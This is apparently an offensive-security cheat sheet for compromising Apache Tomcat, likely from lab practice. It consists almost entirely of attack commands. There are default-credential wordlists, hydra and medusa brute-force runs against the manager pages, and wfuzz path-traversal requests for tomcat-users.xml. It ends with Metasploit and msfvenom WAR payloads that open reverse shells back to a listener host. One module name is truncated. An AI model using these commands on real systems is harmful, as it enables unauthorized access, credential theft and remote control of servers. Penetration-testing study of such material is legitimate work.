Skip to content

Apache Tomcat

Reconnaissance


ping

ping -c 1 $IP
64 bytes from 10.10.10.95: icmp_seq=1 ttl=127 time=46.8 ms
nmap
sudo nmap -p- -Pn $IP
sudo nmap -p 8080 -Pn -sC -sV $IP

URL


  • http://$IP:8080/manager/status
  • http://$IP:8080/manager/html
  • http://$IP:8080/host-manager/html

Bruteforce attack


user.txt

admin
both
manager
role
role1
root
tomcat
pass.txt
password
admin
changethis
manager
password
password1
Password1
r00t
role1
root
s3cret
tomcat
toor

medusa – /manager/status

medusa -h $IP -n 8080 -U user.txt -P pass.txt -M  http -m DIR:/manager/status -T 10  
hydra – /manager/status
hydra -L user.txt -P pass.txt -s 8080 -f $IP http-get /manager/status

medusa – /manager/html

medusa -h $IP -n 8080 -U user.txt -P pass.txt -M  http -m DIR:/manager/html -T 10  
hydra – /manager/html
hydra -L user.txt -P pass.txt -s 8080 -f $IP http-get /manager/html 

medusa – /host-manager/html

medusa -h $IP -n 8080 -U user.txt -P pass.txt -M  http -m DIR:/host-manager/html -T 10  
hydra – /host-manager/html
hydra -L user.txt -P pass.txt -s 8080 -f $IP http-get /host-manager/html 

Enumeration users.xml


path.txt

etc
conf
var
lib
ROOT
usr
share
doc
opt
tomcat7
tomcat8
tomcat9
webapps
tomcat7-common
tomcat8-common
tomcat9-common

wfuzz -c -w path.txt -w path.txt --prefilter "FUZZ!=FUZ2Z" -u http://$URL/news.php?file=../../../../FUZZ/FUZ2Z/tomcat-users.xml --hl 0

wfuzz -c -w path.txt -w path.txt -w path.txt --prefilter "FUZZ!=FUZ2Z and FUZZ!=FUZ3Z and FUZ2Z!=FUZ3Z" -u http://$URL/news.php?file=../../../../FUZZ/FUZ2Z/FUZ3Z/tomcat-users.xml --hl 0

wfuzz -c -w path.txt -w path.txt -w path.txt -w path.txt --prefilter "FUZZ!=FUZ2Z and FUZZ!=FUZ3Z and FUZZ!=FUZ4Z and FUZ2Z!=FUZ3Z and FUZ2Z!=FUZ4Z and FUZ3Z!=FUZ4Z" -u http://$URL/news.php?file=../../../../FUZZ/FUZ2Z/FUZ3Z/FUZ4Z/tomcat-users.xml --hl 0

Explotation

exploit 1 – metasploit

use exploit/multi/http/tomcat_mgr_uploa
set RHOST 10.10.10.95
set RPORT 8080
set LHOST 10.10.14.16
set LPORT 4444
set HttpUsername tomcat
set HttpPassword s3cret
options
run

exploit 2 – shell.war

payload

msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f war -o shell.war
listener
nc -lvnp 4444

exploit 3 – shell.war

payload

msfvenom -p java/meterpreter/reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f war -o shell2.war
listener
msfconsole -q -x "use multi/handler; set payload java/meterpreter/reverse_tcp; set lhost 10.10.14.16; set lport 4444; exploit"